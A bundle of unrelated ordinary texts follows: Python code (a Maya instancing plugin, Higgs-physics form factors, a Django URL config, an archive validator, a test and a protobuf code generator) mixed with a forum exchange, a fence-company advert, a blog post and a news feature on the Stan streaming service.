nodeAttr = pm.PyNode(nodeName + ".instancingMode")
mode = nodeAttr.get("instancingMode")
# If dimmed, do not update dimming
if mode == 0:
self.dimControl(nodeName, "instanceLength", True)
self.dimControl(nodeName, "maxInstancesByLength", True)
self.updateDimming(nodeName, "instanceCount")
else:
self.updateDimming(nodeName, "instanceLength")
self.updateDimming(nodeName, "maxInstancesByLength")
self.dimControl(nodeName, "instanceCount", True)
# Command
class instanceAlongCurveCommand(OpenMayaMPx.MPxCommand):
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
self.mUndo = []
def isUndoable(self):
return True
def undoIt(self):
OpenMaya.MGlobal.displayInfo( "Undo: instanceAlongCurveCommand\n" )
# Reversed for undo :)
for m in reversed(self.mUndo):
m.undoIt()
def redoIt(self):
OpenMaya.MGlobal.displayInfo( "Redo: instanceAlongCurveCommand\n" )
for m in self.mUndo:
m.doIt()
def hasShapeBelow(self, dagPath):
sutil = OpenMaya.MScriptUtil()
uintptr = sutil.asUintPtr()
sutil.setUint(uintptr , 0)
dagPath.numberOfShapesDirectlyBelow(uintptr)
return sutil.getUint(uintptr) > 0
def findShadingGroup(self, dagPath):
# Search in children first before extending to shape
for child in xrange(dagPath.childCount()):
childDagPath = OpenMaya.MDagPath()
fnDagNode = OpenMaya.MFnDagNode(dagPath.child(child))
fnDagNode.getPath(childDagPath)
fnSet = self.findShadingGroup(childDagPath)
if fnSet is not None:
return fnSet
if self.hasShapeBelow(dagPath):
dagPath.extendToShape()
fnDepNode = OpenMaya.MFnDependencyNode(dagPath.node())
instPlugArray = fnDepNode.findPlug("instObjGroups")
instPlugArrayElem = instPlugArray.elementByLogicalIndex(dagPath.instanceNumber())
if instPlugArrayElem.isConnected():
connectedPlugs = OpenMaya.MPlugArray()
instPlugArrayElem.connectedTo(connectedPlugs, False, True)
if connectedPlugs.length() == 1:
sgNode = connectedPlugs[0].node()
if sgNode.hasFn(OpenMaya.MFn.kSet):
return OpenMaya.MFnSet(sgNode)
return None
def doIt(self,argList):
try:
list = OpenMaya.MSelectionList()
OpenMaya.MGlobal.getActiveSelectionList(list)
if list.length() == 2:
curveDagPath = OpenMaya.MDagPath()
list.getDagPath(0, curveDagPath)
curveDagPath.extendToShape()
shapeDagPath = OpenMaya.MDagPath()
list.getDagPath(1, shapeDagPath)
if(curveDagPath.node().hasFn(OpenMaya.MFn.kNurbsCurve)):
# We need the curve transform
curvePlug = OpenMaya.MFnDagNode(curveDagPath).findPlug("worldSpace", False).elementByLogicalIndex(0)
# We need the shape's transform too
transformFn = OpenMaya.MFnDagNode(shapeDagPath.transform())
transformMessagePlug = transformFn.findPlug("message", True)
shadingGroupFn = self.findShadingGroup(shapeDagPath)
# Create node first
mdagModifier = OpenMaya.MDagModifier()
self.mUndo.append(mdagModifier)
newNode = mdagModifier.createNode(kPluginNodeId)
mdagModifier.doIt()
# Assign new correct name and select new locator
newNodeFn = OpenMaya.MFnDagNode(newNode)
newNodeFn.setName("instanceAlongCurveLocator#")
newNodeTransformName = newNodeFn.name()
# Get the node shape
nodeShapeDagPath = OpenMaya.MDagPath()
newNodeFn.getPath(nodeShapeDagPath)
nodeShapeDagPath.extendToShape()
newNodeFn = OpenMaya.MFnDagNode(nodeShapeDagPath)
def setupRamp(rampAttr):
# Set default ramp values
defaultPositions = OpenMaya.MFloatArray(1, 0.0)
defaultValues = OpenMaya.MFloatArray(1, 1.0)
defaultInterpolations = OpenMaya.MIntArray(1, 3)
plug = newNodeFn.findPlug(rampAttr.ramp)
ramp = OpenMaya.MRampAttribute(plug)
ramp.addEntries(defaultPositions, defaultValues, defaultInterpolations)
setupRamp(instanceAlongCurveLocator.positionRampAttr)
setupRamp(instanceAlongCurveLocator.rotationRampAttr)
setupRamp(instanceAlongCurveLocator.scaleRampAttr)
# Select new node shape
OpenMaya.MGlobal.clearSelectionList()
msel = OpenMaya.MSelectionList()
msel.add(nodeShapeDagPath)
OpenMaya.MGlobal.setActiveSelectionList(msel)
# Connect :D
mdgModifier = OpenMaya.MDGModifier()
self.mUndo.append(mdgModifier)
mdgModifier.connect(curvePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputCurveAttr))
mdgModifier.connect(transformMessagePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputTransformAttr))
if shadingGroupFn is not None:
shadingGroupMessagePlug = shadingGroupFn.findPlug("message", True)
mdgModifier.connect(shadingGroupMessagePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputShadingGroupAttr))
mdgModifier.doIt()
# (pymel) create a locator and make it the parent
locator = pm.createNode('locator', ss=True, p=newNodeTransformName)
# Show AE because instancing logic depends on update...
mel.eval("openAEWindow")
# Enable drawing overrides
instanceCountPlug = newNodeFn.findPlug("instanceCount", False)
instanceCountPlug.setInt(10)
else:
sys.stderr.write("Please select a curve first")
else:
sys.stderr.write("Please select a curve and a shape")
except:
sys.stderr.write('Failed trying to create locator. stack trace: \n')
sys.stderr.write(traceback.format_exc())
@staticmethod
def cmdCreator():
return OpenMayaMPx.asMPxPtr( instanceAlongCurveCommand() ) |
England failed to qualify for Euro 2008 after losing a sensational game against Croatia at Wembley.
Why do we waste valuable airtime on these pathetic no marks? Time to embrace a vastly superior sport as our national game.
Why isn't Rugby Union our national sport?
Was Jen born on the day the Origin of Species was released to the trade while Darwin shivered and swore in Ilkley?
I'd say it was feted.
Please to pass on b'day congrats.
She was indeed. And, if there's anything in that reincarnation nonsense (which there isn't, by the way), she might well have inherited the spirit of JFK.
I shall pass on your congrats. |
##########################################################################
#
# This file is part of Lilith
# made by J. Bernon and B. Dumont
#
# Web page: http://lpsc.in2p3.fr/projects-th/lilith/
#
# In case of questions email bernon@lpsc.in2p3.fr dum33@ibs.re.kr
#
#
# Lilith is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lilith is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Lilith. If not, see <http://www.gnu.org/licenses/>.
#
##########################################################################
import os
import numpy as np
from math import sqrt, log
from cmath import sqrt as csqrt
from cmath import asin as casin
from cmath import log as clog
from scipy.interpolate import UnivariateSpline
from param import *
wdir = '/'.join(os.path.realpath(__file__).split("/")[:-1])+'/Grids/'
#### read VBF -> h cross section grid @ LO and interpolation ####
def VBF_ff(spline_deg=3):
VBF_LO_file = open(wdir+'VBF_LO_grid.dat',"r")
VBF_LO_grid = {"WW": [], "ZZ": [], "WZ": []}
hmassVBF = []
for line in VBF_LO_file:
line = line.strip("\n").split()
hmassVBF.append(float(line[0]))
VBF_LO_grid["WW"].append(float(line[1]))
VBF_LO_grid["ZZ"].append(float(line[2]))
VBF_LO_grid["WZ"].append(float(line[3])-float(line[1])-float(line[2]))
CVBFW_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["WW"], k=spline_deg, s=0)
CVBFZ_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["ZZ"], k=spline_deg, s=0)
CVBFWZ_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["WZ"], k=spline_deg, s=0)
VBF_LO_file.close()
VBF_LO = {"CVBFW_LO": CVBFW_LO, "CVBFZ_LO": CVBFZ_LO, "CVBFWZ_LO": CVBFWZ_LO}
return VBF_LO
def fhiggs(t):
if t<=1.:
return casin(sqrt(t))**2.
else:
return -(log((sqrt(t) + sqrt(t-1.))/(sqrt(t) - sqrt(t-1.))) - pi*1j )**2./4.
def ghiggs(t):
if t<=1:
return csqrt(1-1/t)/2. * ( clog((1 + csqrt(1-1/t))/(1 - csqrt(1-1/t)))-pi*1j)
else:
return csqrt(1/t-1)*casin(csqrt(t))
def I1(tau,l):
return (tau*l/(2.*(tau-l)) + tau**2*l**2 /(2.*(tau-l)**2)*(fhiggs(1/tau)-fhiggs(1/l)) +
tau**2 * l /(tau-l)**2 * (ghiggs(1/tau)-ghiggs(1/l)))
def I2(tau,l):
return -tau*l/(2.*(tau-l))*(fhiggs(1/tau)-fhiggs(1/l))
def A12(tau):
return 2./tau *(1.+(1.-1./tau) * fhiggs(tau))
def A1(tau):
return -(3.*tau+2.*tau**2. +3.*(2.*tau-1.) * fhiggs(tau))/tau**2
def A12Zgamma(tau,l):
return I1(tau,l)-I2(tau,l)
def A1Zgamma(tau,l):
return cW*(4.*(3.-sW2/cW2)*I2(tau,l)+((1.+2./tau)*sW2/cW2-(5.+2./tau))*I1(tau,l))
def A12A(tau):
return 2/tau*fhiggs(tau)
def computeformfactors():
FF = {}
FF["A12t"] = lambda mh: A12((mh/(2.*mt))**2)
FF["A12c"] = lambda mh: A12((mh/(2.*mc))**2)
FF["A12b"] = lambda mh: A12((mh/(2.*mb))**2)
FF["A12tau"] = lambda mh: A12((mh/(2.*mtau))**2)
FF["A1W"] = lambda mh: A1((mh/(2.*mW))**2)
FF["A12At"] = lambda mh: A12A((mh/(2.*mt))**2)
FF["A12Ac"] = lambda mh: A12A((mh/(2.*mc))**2)
FF["A12Ab"] = lambda mh: A12A((mh/(2.*mb))**2)
FF["A12Atau"] = lambda mh: A12A((mh/(2.*mtau))**2)
FF["A12Zt"] = lambda mh: A12Zgamma(4*(mt/(mh*1.))**2, 4*(mt/(mZ*1.))**2)
FF["A12Zc"] = lambda mh: A12Zgamma(4*(mc/(mh*1.))**2, 4*(mc/(mZ*1.))**2)
FF["A12Zb"] = lambda mh: A12Zgamma(4*(mb/(mh*1.))**2, 4*(mb/(mZ*1.))**2)
FF["A12Ztau"] = lambda mh: A12Zgamma(4*(mtau/(mh*1.))**2, 4*(mtau/(mZ*1.))**2)
FF["A1ZW"] = lambda mh: A1Zgamma(4*(mW/(mh*1.))**2, 4*(mW/(mZ*1.))**2)
FF["A12AZt"] = lambda mh: I2(4*(mt/(mh*1.))**2, 4*(mt/(mZ*1.))**2)
FF["A12AZc"] = lambda mh: I2(4*(mc/(mh*1.))**2, 4*(mc/(mZ*1.))**2)
FF["A12AZb"] = lambda mh: I2(4*(mb/(mh*1.))**2, 4*(mb/(mZ*1.))**2)
FF["A12AZtau"] = lambda mh: I2(4*(mtau/(mh*1.))**2, 4*(mtau/(mZ*1.))**2)
return FF
#### decay: h -> gamma gamma width @ LO & reduced coupling ####
def Htogammagamma(mh, CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF):
return (10**6*Gf*alpha**2/(128.*pi**3*np.sqrt(2))*mh**3 *
abs(3.*(2./3.)**2 *(CT*FF["A12t"] + CC*FF["A12c"]) +
(CB*3.*(1./3.)**2 * FF["A12b"] + CL*FF["A12tau"])+CW*FF["A1W"])**2. +
10**6*Gf*alpha**2/(128.*pi**3*np.sqrt(2))*mh**3 *
abs(3.*(2./3.)**2 *(CTIM*FF["A12At"] + CCIM*FF["A12Ac"]) +
(CBIM*3.*(1./3.)**2 * FF["A12Ab"] + CLIM*FF["A12Atau"]))**2.)
def redCgammagamma(CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF, Cgammagammaadd=0.):
A12t = FF["A12t"]
A12c = FF["A12c"]
A12b = FF["A12b"]
A12tau = FF["A12tau"]
A1W = FF["A1W"]
A12At = FF["A12At"]
A12Ac = FF["A12Ac"]
A12Ab = FF["A12Ab"]
A12Atau = FF["A12Atau"]
return (sqrt( ( (abs(3.*(2./3.)**2 *(CT*A12t + CC*A12c) +
CB*3.*(1./3.)**2 * A12b + CL*A12tau+CW*A1W)**2.) +
(abs(3.*(2./3.)**2 *(CTIM*A12At + CCIM*A12Ac) +
3.*(-1./3.)**2*CBIM*A12Ab + CLIM*A12Atau)**2)) /
(abs(3.*(2./3.)**2 *(A12t + A12c) +
(3.*(1./3.)**2 * A12b + A12tau)+A1W)**2.) )
+ Cgammagammaadd)
#### decay: h -> Z gamma width @ LO & reduced coupling ####
def HtoZgamma(mh, CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF):
return (10**6*Gf**2*mW**2*alpha*mh**3/(64.*pi**4)*(1-mZ**2/mh**2)**3 *
abs( 1/(cW)*3.*2/3.*(CT*(2*1/2. - 4*2/3.*sW2)*FF["A12Zt"] +
CC*(2*1/2. - 4*2/3.*sW2)*FF["A12Zc"]) +
1/(cW)*(3*(-1/3.)*CB*(2*(-1/2.) - 4*(-1/3.)*sW2)*FF["A12Zb"] +
(-1)*CL*(2*(-1/2.) - 4*(-1)*sW2)*FF["A12Ztau"]) +
CW*FF["A1ZW"] )**2 +
10**6*Gf**2*mW**2*alpha*mh**3/(16.*pi**4)*(1-mZ**2/mh**2)**3 *
abs( 1/(cW)*3.*2/3.*(CTIM*(2*1/2. - 4*2/3.*sW2)*FF["A12AZt"] +
CCIM*(2*1/2. - 4*2/3.*sW2)*FF["A12AZc"]) +
1/(cW)*(3*(-1/3.)*CBIM*(2*(-1/2.) - 4*(-1/3.)*sW2)*FF["A12AZb"] +
(-1)*CL*(2*(-1/2.) - 4*(-1)*sW2)*FF["A12Ztau"]) )**2)
def redCZgamma(CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF, CZgammaadd=0.):
A12Zt = FF["A12Zt"]
A12Zc = FF["A12Zc"]
A12Zb = FF["A12Zb"]
A12Ztau = FF["A12Ztau"]
A1ZW = FF["A1ZW"]
A12AZt = FF["A12AZt"]
A12AZc = FF["A12AZc"]
A12AZb = FF["A12AZb"]
A12AZtau = FF["A12AZtau"]
vt = (2*1/2. - 4*2/3.*sW2)
vc = (2*1/2. - 4*2/3.*sW2)
vb = (2*(-1/2.) - 4*(-1/3.)*sW2)
vl = (2*(-1/2.) - 4*(-1)*sW2)
return (sqrt( (abs( 1/(cW)*(3.*2/3.*(CT*vt*A12Zt + CC*vc*A12Zc) +
(3*(-1/3.)*CB*vb*A12Zb +
(-1)*CL*vl*A12Ztau)) + CW*A1ZW )**2 +
4*abs(1/(cW)*(3.*2/3.*(CTIM*vt*A12AZt + CCIM*vc*A12AZc) +
3*(-1/3.)*CBIM*vb*A12AZb + (-1)*CLIM*vl*A12AZtau))**2)/
(abs(1/(cW)*(3.*2/3.*(vt*A12Zt + vc*A12Zc) +
(3*(-1/3.)*vb*A12Zb + (-1)*vl*A12Ztau)) + A1ZW )**2) )
+ CZgammaadd)
#### decay: h -> g g width @ LO & reduced coupling ####
def Htogg(mh, CT, CB, CC, CTIM, CBIM, CCIM, FF):
return (10**3*Gf*alphas**2*mh**3/(36.*np.sqrt(2)*pi**3) *
abs(0.75*(CT*FF["A12t"] + CB*FF["A12b"] + CC*FF["A12c"]))**2 +
10**3*Gf*alphas**2*mh**3/(36.*np.sqrt(2)*pi**3) *
abs(0.75*(CTIM*FF["A12At"] + CBIM*FF["A12Ab"] + CCIM*FF["A12Ac"]))**2)
def redCgg(CT, CB, CC, CTIM, CBIM, CCIM, FF, Cggadd=0.):
A12t = FF["A12t"]
A12c = FF["A12c"]
A12b = FF["A12b"]
A12At = FF["A12At"]
A12Ac = FF["A12Ac"]
A12Ab = FF["A12Ab"]
return (sqrt( (abs(0.75*(CT*A12t + CB*A12b + CC*A12c))**2 +
abs(0.75*(CTIM*A12At + CBIM*A12Ab + CCIM*A12Ac))**2)/
(abs(0.75*(A12t + A12b + A12c))**2) )
+ Cggadd)
#### production: g g -> h cross section @ LO ####
def ggFh(mh, CT, CB, CC, CTIM, CBIM, CCIM, FF):
return (Gf*alphas_mh**2/(288.*np.sqrt(2)*pi) *
abs(0.75*(CT*FF["A12t"] + CB*FF["A12b"] + CC*FF["A12c"]))**2 +
Gf*alphas_mh**2/(288.*np.sqrt(2)*pi) *
abs(0.75*(CTIM*FF["A12At"] + CBIM*FF["A12Ab"] + CCIM*FF["A12Ac"]))**2)
#### production: VBF -> h cross section @ LO & reduced coupling ####
def redCVBF(CW, CZ, grid_interp):
VBFW_LO = grid_interp["CVBFW_LO"]
VBFZ_LO = grid_interp["CVBFZ_LO"]
VBFWZ_LO = grid_interp["CVBFWZ_LO"]
return sqrt( (CW**2*VBFW_LO + CZ**2*VBFZ_LO + CW*CZ*VBFWZ_LO)/
(VBFW_LO + VBFZ_LO + VBFWZ_LO) )
|
You can trust in Fence Installation Guys to deliver the most impressive professional services regarding Fences in Essex Junction, VT. Our team of well trained contractors will offer the support you need with the most innovative technologies around. Our materials are of the best quality and we have learned to save you costs. We intend to provide help to put together decisions for your own work, reply to your questions, and arrange a meeting with our workers once you give us a call at 800-341-4840.
You have a budget to stick to, and you intend to save money. You'll still need to get superior services with Fences in Essex Junction, VT, and you can have faith in our business to save you money while continuing with supplying the very best quality results. Our attempts to save a little money are not going to compromise the superior quality of our work. We work with the finest solutions and supplies to be certain that your job will withstand the test of time, and conserve your funds with strategies that don't affect the excellence for your mission. We will accomplish this by providing you with the top discounts available and eliminating expensive blunders. To be able to lower your expenses, Fence Installation Guys is the company to connect with. You are able to connect with us at 800-341-4840 to start.
If you're considering Fences in Essex Junction, VT, you should be knowledgeable to make the most effective judgments. We ensure you know exactly what can be expected. We will take the unexpected situations from the equation by providing adequate and detailed information. You can start by talking about your job with our customer support reps when you call 800-341-4840. We will talk about your questions and concerns once you contact us and get you organized with a scheduled appointment. We consistently appear at the appointed time, all set to work with you.
If you find yourself organizing a job regarding Fences in Essex Junction, VT, there are lots of reasons to work with Fence Installation Guys. We've got the greatest customer satisfaction ratings, the best resources, and the most helpful and reliable cash saving practices. Our company has the expertise you need to fulfill your goals and objectives. Dial 800-341-4840 to reach Fence Installation Guys and discuss your expectations regarding Fences in Essex Junction. |
"""advogaprojeto URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from core import views
from django.contrib import admin
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^registrar/$', views.registrar, name='registrar'),
url(r'^login/$', views.login, name='login'),
url(r'^logout/$', views.log_out, name='logout'),
url(r'^index/$', views.index, name='index'),
url(r'^gerar_documento$', views.gerar_documento, name='gerar_documento'),
url(r'^cadastro$', views.cadastrar_documento, name='cadastrar_documento'),
url(r'^documento/(?P<id_arquivo>\d+)$', views.documento, name='documento'),
url(r'^delete/(?P<id_template>\d+)$', views.delete_template, name='delete')
]
|
I guess I have decided not to buy the car. I’m very sure I could get the loan since I started working but I don’t want to add another payment on to our bills each month until I get all of my doctor bills paid for. I don’t want to make us run low when we don’t have too. You know?
Anyway, Spunky has a vet visit today. His stupid allergies are acting up again since Spring is on its way. The grass makes his eyes water and he is starching himself to death. He has no fleas, so I know that can’t be it. This happen last year too. He gets a shot he feels better. One a month until allergy season is gone. The joys of having a pet. But you know, I wouldn’t trade him for anything.
Just an update since I am trying to get back into this whole blogging thing. I don’t really remember it being this hard. Hmm. |
#!/usr/bin/env python2
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
from __future__ import print_function
import os
import sys
requiredDirectories = ["objects", \
"logs", \
"metadata",\
"metadata/submissionDocumentation"]
allowableFiles = ["processingMCP.xml"]
def checkDirectory(directory, ret=0):
try:
for directory, subDirectories, files in os.walk(directory):
for file in files:
filePath = os.path.join(directory, file)
except Exception as inst:
print("Error navigating directory:", directory.__str__(), file=sys.stderr)
print(type(inst), file=sys.stderr)
print(inst.args, file=sys.stderr)
ret += 1
return ret
def verifyDirectoriesExist(SIPDir, ret=0):
for directory in requiredDirectories:
if not os.path.isdir(os.path.join(SIPDir, directory)):
print("Required Directory Does Not Exist: " + directory, file=sys.stderr)
ret += 1
return ret
def verifyNothingElseAtTopLevel(SIPDir, ret=0):
for entry in os.listdir(SIPDir):
if os.path.isdir(os.path.join(SIPDir, entry)):
if entry not in requiredDirectories:
print("Error, directory exists: " + entry, file=sys.stderr)
ret += 1
else:
if entry not in allowableFiles:
print("Error, file exists: " + entry, file=sys.stderr)
ret += 1
return ret
if __name__ == '__main__':
SIPDir = sys.argv[1]
ret = verifyDirectoriesExist(SIPDir)
ret = verifyNothingElseAtTopLevel(SIPDir, ret)
ret = checkDirectory(SIPDir, ret)
if ret != 0:
import time
time.sleep(10)
quit(ret)
|
StreamCo CEO Mike Sneesby will happily shake the Netflix boss’s hand. Image: Alex Heber.
Netflix on Wednesday announced it would officially launch its Australian streaming service in March 2015.
StreamCo, the $100 million joint venture between Fairfax and Channel 9, has also been madly developing its own internet TV service called Stan.
There has been a lot of speculation around when Stan will be launched but the company’s CEO Mike Sneesby said it has deliberately not confirmed timings.
“We haven’t disclosed our launch date, very intentionally,” he told Business Insider. “There’s clearly a bunch of indicators that might indicate when our launch is going to be and that was speculated in relation to Better Call Saul.
“It’s important that we don’t confirm the date mostly because of that competitive situation.
“I think Netflix has given an indication that it’s March but again they haven’t themselves even fixed a date on that. They may launch earlier, they may launch later than that.
“We are indicatively pegged around a date with Better Call Saul coming to Australia but again we’ve got flexibility as well, and we want to have that flexibility.
Television as a medium and a business is changing rapidly. Only a few years ago there were just a couple of channels and Pay TV ran alongside that. Then digital TV launched and more free-to-air channels were available.
But with technology making content freely available on the internet, consumers are now demanding it be available when and where they want it.
These demands have sparked the internet streaming industry which is led by the likes of Netflix in the US – challenging incumbents in the market.
“This is a revolution and I think the change that’s happened in the last six months has been unbelievable,” StreamCo’s acquisition boss Les Sampson said.
StreamCo picked this trend and started building its own platform. They’ve got a product almost ready to launch into a hot market after being in existence for only just a year. This week Business Insider got to take a look how far the company has already come.
Here's the asbestos-ridden cottage on Channel Nine's Sydney campus where it all started in January this year.
You've got to start somewhere. StreamCo began developing Stan in this run-down cottage on Channel 9's Sydney campus.
Stan CEO Mike Sneesby took Business Insider on a tour of the company's very humble beginnings. To get in, you've got to scoot past the loo.
Every day the team would do a stand-up meeting in this tiny room.
It was freezing in winter. The heating didn't work and the team was making trips to Big W buying oil heaters. They accumulated so many the power kept tripping.
One day one of the tech guys leaned against a window pane and it fell out. There's also asbestos in the building.
There were no fancy kitchens or ping pong tables.
It was generally pretty basic.
But four weeks ago, team Stan relocated into the Channel 9 sales team's old office.
The new digs are much cleaner, brighter and warmer.
And also a little corporate. Stan is growing up.
There's also a MASSIVE TV the team uses to test its Breaking Bad content is working.
Disclosure: Fairfax Media owns Allure Media, publisher of Business Insider Australia. |
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test ExistingCloud."""
import jsonschema
from rally import deploy
from rally.deploy.engines import existing
from tests import test
class TestExistingCloud(test.TestCase):
def setUp(self):
self.deployment = {
'config': {
'name': 'ExistingCloud',
'endpoint': {
'auth_url': 'http://example.net:5000/v2.0/',
'username': 'admin',
'password': 'myadminpass',
'tenant_name': 'demo',
},
},
}
super(TestExistingCloud, self).setUp()
def test_init(self):
existing.ExistingCloud(self.deployment)
def test_init_invalid_config(self):
self.deployment['config']['endpoint'] = 42
self.assertRaises(jsonschema.ValidationError,
existing.ExistingCloud, self.deployment)
def test_deploy(self):
engine = existing.ExistingCloud(self.deployment)
endpoints = engine.deploy()
admin_endpoint = self.deployment['config']['endpoint'].copy()
self.assertEqual(admin_endpoint, endpoints[0].to_dict())
def test_cleanup(self):
existing.ExistingCloud(self.deployment).cleanup()
def test_is_in_factory(self):
name = self.deployment['config']['name']
engine = deploy.EngineFactory.get_engine(name,
self.deployment)
self.assertIsInstance(engine, existing.ExistingCloud)
|
I’m not interested in Satuhn, I said Mahs.
- Arnold Schwarzenegger, Total Recall.
An interesting production from Louis Vuitton, take a look at one of the most in depth digital mapping of the red planet.
RED JOURNEY from MANEKI LAB on Vimeo. |
#!/usr/bin/env python
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from google.protobuf.compiler import plugin_pb2 as plugin
from google.protobuf.descriptor_pb2 import ServiceDescriptorProto, \
MethodOptions
from jinja2 import Template
from simplejson import dumps
import yang_options_pb2
from netconf.protos.third_party.google.api import annotations_pb2, http_pb2
_ = annotations_pb2, http_pb2 # to keep import line from being optimized out
template = Template("""
# Generated file; please do not edit
from simplejson import dumps, load
from structlog import get_logger
from google.protobuf.json_format import MessageToDict, ParseDict
from twisted.internet.defer import inlineCallbacks, returnValue
{% set package = file_name.replace('.proto', '') %}
{% for pypackage, module in includes %}
{% if pypackage %}
from {{ pypackage }} import {{ module }}
{% else %}
import {{ module }}
{% endif %}
{% endfor %}
log = get_logger()
{% for method in methods %}
{% set method_name = method['service'].rpartition('.')[2] + '_' + method['method'] %}
@inlineCallbacks
def {{ method_name }}(grpc_client, params, metadata, **kw):
log.info('{{ method_name }}', params=params, metadata=metadata, **kw)
data = params
data.update(kw)
try:
req = ParseDict(data, {{ type_map[method['input_type']] }}())
except Exception, e:
log.error('cannot-convert-to-protobuf', e=e, data=data)
raise
res, _ = yield grpc_client.invoke(
{{ type_map[method['service']] }}Stub,
'{{ method['method'] }}', req, metadata)
try:
out_data = grpc_client.convertToDict(res)
except AttributeError, e:
filename = '/tmp/netconf_failed_to_convert_data.pbd'
with file(filename, 'w') as f:
f.write(res.SerializeToString())
log.error('cannot-convert-from-protobuf', outdata_saved=filename)
raise
log.info('{{ method_name }}', **out_data)
returnValue(out_data)
def get_xml_tag_{{ method_name }}():
return '{{ method['xml_tag'] }}'
def get_list_items_name_{{ method_name }}():
return '{{ method['list_item_name'] }}'
def get_return_type_{{ method_name }}():
return '{{ type_map[method['output_type']] }}'
{% endfor %}
""", trim_blocks=True, lstrip_blocks=True)
def traverse_methods(proto_file):
package = proto_file.name
for service in proto_file.service:
assert isinstance(service, ServiceDescriptorProto)
for method in service.method:
input_type = method.input_type
if input_type.startswith('.'):
input_type = input_type[1:]
output_type = method.output_type
if output_type.startswith('.'):
output_type = output_type[1:]
# Process any specific yang option
xml_tag = ''
list_item_name = ''
options = method.options
assert isinstance(options, MethodOptions)
for fd, yang_tag in options.ListFields():
if fd.full_name == 'voltha.yang_xml_tag':
if yang_tag.xml_tag:
xml_tag = yang_tag.xml_tag
if yang_tag.list_items_name:
list_item_name = yang_tag.list_items_name
data = {
'package': package,
'filename': proto_file.name,
'service': proto_file.package + '.' + service.name,
'method': method.name,
'input_type': input_type,
'output_type': output_type,
'xml_tag': xml_tag,
'list_item_name': list_item_name
}
yield data
def generate_gw_code(file_name, methods, type_map, includes):
return template.render(file_name=file_name, methods=methods,
type_map=type_map, includes=includes)
class IncludeManager(object):
# need to keep track of what files define what message types and
# under what package name. Later, when we analyze the methods, we
# need to be able to derive the list of files we need to load and we
# also need to replce the <proto-package-name>.<artifact-name> in the
# templates with <python-package-name>.<artifact-name> so Python can
# resolve these.
def __init__(self):
self.package_to_localname = {}
self.fullname_to_filename = {}
self.prefix_table = [] # sorted table of top-level symbols in protos
self.type_map = {} # full name as used in .proto -> python name
self.includes_needed = set() # names of files needed to be included
self.filename_to_module = {} # filename -> (package, module)
def extend_symbol_tables(self, proto_file):
# keep track of what file adds what top-level symbol to what abstract
# package name
package_name = proto_file.package
file_name = proto_file.name
self._add_filename(file_name)
all_defs = list(proto_file.message_type)
all_defs.extend(list(proto_file.enum_type))
all_defs.extend(list(proto_file.service))
for typedef in all_defs:
name = typedef.name
fullname = package_name + '.' + name
self.fullname_to_filename[fullname] = file_name
self.package_to_localname.setdefault(package_name, []).append(name)
self._update_prefix_table()
def _add_filename(self, filename):
if filename not in self.filename_to_module:
python_path = filename.replace('.proto', '_pb2').replace('/', '.')
package_name, _, module_name = python_path.rpartition('.')
self.filename_to_module[filename] = (package_name, module_name)
def _update_prefix_table(self):
# make a sorted list symbol prefixes needed to resolv for potential use
# of nested symbols
self.prefix_table = sorted(self.fullname_to_filename.iterkeys(),
reverse=True)
def _find_matching_prefix(self, fullname):
for prefix in self.prefix_table:
if fullname.startswith(prefix):
return prefix
# This should never happen
raise Exception('No match for type name "{}"'.format(fullname))
def add_needed_symbol(self, fullname):
if fullname in self.type_map:
return
top_level_symbol = self._find_matching_prefix(fullname)
name = top_level_symbol.rpartition('.')[2]
nested_name = fullname[len(top_level_symbol):] # may be empty
file_name = self.fullname_to_filename[top_level_symbol]
self.includes_needed.add(file_name)
